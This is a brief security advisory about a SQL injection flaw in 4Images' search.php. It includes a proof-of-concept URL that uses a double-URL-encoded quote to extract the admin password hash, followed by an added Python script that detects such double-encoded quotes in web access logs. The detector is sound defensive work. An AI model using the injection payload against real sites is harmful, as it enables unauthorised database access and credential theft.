4Images Search.PHP SQL Injection Vulnerability

Attackers can exploit these issues via a web client.

The following proof of concept is available:

http://www.example.com/<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN
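The proof of concept writes the single quote as `%2527`, which becomes `%27` after one URL-decoding pass and `'` only after a second, so a check that inspects the value after one pass sees no quote. The following detection sketch for web access logs is an added example, not part of the original advisory; the log lines are constructed and the `/gallery/` path is a placeholder.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (not real traffic); /gallery/ is a placeholder path.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /gallery/search.php?search_user=alice HTTP/1.1" 200 512',
    '198.51.100.8 - - [01/Jan/2010:10:00:05 +0000] "GET /gallery/search.php?search_user=O%27Brien HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /gallery/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN HTTP/1.1" 200 733',
]
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
MAX_PASSES = 4  # bound the decode loop against deeply nested encodings


def quote_depth(raw_value):
    """Number of URL-decode passes before a single quote appears, else None."""
    value = raw_value
    for depth in range(MAX_PASSES + 1):
        if "'" in value:
            return depth
        decoded = unquote(value)
        if decoded == value:  # fully decoded and no quote was found
            return None
        value = decoded
    return None


def scan(lines):
    """Flag query values whose quote appears only after 2+ decode passes."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")  # raw value, still encoded
            depth = quote_depth(raw)
            if depth is not None and depth >= 2:
                decoded = raw
                for _ in range(depth):
                    decoded = unquote(decoded)
                findings.append((line_no, name, depth, decoded))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A quote at depth 1 (the `O%27Brien` line) is ordinary input and is not reported; only a quote hidden behind an extra encoding layer is flagged.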


 

Copyright 2010, SecurityFocus